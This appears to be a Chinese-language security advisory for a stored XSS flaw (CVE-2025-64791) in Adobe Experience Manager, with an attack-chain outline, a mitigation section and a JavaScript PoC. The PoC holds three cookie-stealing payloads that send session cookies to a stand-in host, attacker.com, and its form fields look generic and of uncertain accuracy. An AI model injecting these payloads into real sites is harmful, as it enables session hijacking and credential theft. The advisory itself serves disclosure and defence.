CVE-2025-64791 Adobe Experience Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64791

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64791是Adobe Experience Manager中的一个存储型跨站脚本（Stored XSS）漏洞，CVSS评分5.4，属于中危级别。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。攻击者利用低权限账户即可将恶意JavaScript脚本注入到存在漏洞的表单字段中。当其他用户访问包含该恶意字段的页面时，注入的脚本会在受害者浏览器中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。由于是存储型XSS，恶意脚本会持久保存在服务器端，影响所有访问该页面的用户。此漏洞需要用户交互才能触发，攻击复杂度较低，对机密性和完整性有低影响，对可用性无影响。

技术细节

该漏洞是典型的存储型XSS（Stored Cross-Site Scripting）漏洞，存在于Adobe Experience Manager的表单处理模块中。攻击流程如下：1）低权限攻击者登录系统后，在表单输入字段中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>）；2）由于输入验证不足，恶意脚本被存储在服务器数据库中；3）当其他用户访问包含该表单字段的页面时，服务器从数据库读取并展示恶意内容；4）受害者浏览器将恶意脚本作为页面的一部分执行，从而触发XSS攻击。攻击者可利用此漏洞窃取受害者的会话令牌、凭据，修改页面内容进行钓鱼攻击，或在受害者权限范围内执行操作。由于Adobe Experience Manager是企业级内容管理系统，常用于管理敏感业务数据和用户信息，此类XSS漏洞可能对企业网络安全造成严重威胁。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标Adobe Experience Manager实例，定位存在漏洞的表单功能模块

STEP 2

步骤2

账户获取：攻击者获取系统低权限账户（如内容编辑者或普通用户权限）

STEP 3

步骤3

Payload注入：攻击者在表单输入字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 4

步骤4

数据持久化：恶意脚本被存储在服务器数据库中，等待其他用户访问

STEP 5

步骤5

触发执行：当受害者访问包含恶意字段的页面时，浏览器解析并执行注入的脚本

STEP 6

步骤6

攻击完成：攻击者通过执行脚本窃取用户会话Cookie、凭据或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64791 Stored XSS PoC for Adobe Experience Manager
// This PoC demonstrates injecting malicious JavaScript into vulnerable form fields

// Step 1: Identify vulnerable form field
// Target URL pattern: https://target-aem-host.com/content/forms/af/[form-name].html

// Step 2: Inject XSS payload into form field
const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';

// Step 3: Submit the form with malicious payload
// POST request to: /content/forms/af/[form-name].jsp
const formData = {
  'field_name': xssPayload,  // Vulnerable field
  './jcr:data': xssPayload,
  ':operation': 'social:createComment'
};

// Step 4: When victim visits the page, XSS will be triggered
// The injected script will execute in victim's browser context

// Alternative payload for cookie theft:
const cookieTheftPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?c=\'+btoa(document.cookie))">';

// Payload to demonstrate session hijacking:
const sessionHijackPayload = '<script>document.location="https://attacker.com/hijack?"+document.cookie</script>';

影响范围

Adobe Experience Manager 6.5.23及更早版本

Adobe Experience Manager 6.5.x < 6.5.24

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）对所有表单输入实施严格的输入验证，过滤或编码特殊字符如<、>、"、'、script等；2）在输出时对用户提交的内容进行HTML实体编码；3）配置Content-Security-Policy响应头限制脚本执行；4）限制低权限用户创建或编辑表单字段的能力；5）启用Adobe Experience Manager的安全配置，对内容进行定期安全扫描；6）监控异常访问日志，及时发现潜在攻击行为。